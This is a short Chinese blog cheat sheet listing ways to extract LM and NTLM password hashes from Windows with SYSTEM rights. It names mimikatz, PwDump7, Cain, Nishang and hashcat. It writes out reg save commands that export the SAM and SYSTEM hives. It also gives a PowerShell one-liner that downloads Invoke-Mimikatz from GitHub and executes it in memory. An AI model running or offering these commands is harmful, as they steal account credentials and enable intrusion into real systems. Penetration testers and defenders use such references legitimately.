Windows系统LM Hash和NTLM Hash凭证获取方法速查
我超怕的 https://www.cnblogs.com/iAmSoScArEd/p/17169904.html
凭证获取需要System权限。
1、使用GetPass工具
2、使用PwDump7工具
3、使用QuarksPwDump工具(报毒)
4、使用命令导出 reg save hklm\sam sam.hive
、reg save hklm\system system.hive
SAM文件
5、使用mimikatz工具读内存、自动获取本机SAM、读取4导出的文件、读取导出的lsass.exe进程的dmp文件、
6、使用Cain工具读取4中的文件
7、使用Nishang的Get-PassHashes.ps1脚本
8、使用PowerShell远程加载mimikatz powershell IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz
https://github.com/PowerShellMafia/PowerSploit 也提供了多种powershell脚本
9、使用hashcat破解hash
10、解析windows的ntds.dit文件
俗人昭昭,我独昏昏。俗人察察,我独闷闷。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 全程不用写代码,我用AI程序员写了一个飞机大战
· DeepSeek 开源周回顾「GitHub 热点速览」
· 记一次.NET内存居高不下排查解决与启示
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· .NET10 - 预览版1新功能体验(一)
2019-03-07 Linux修改MAC地址方法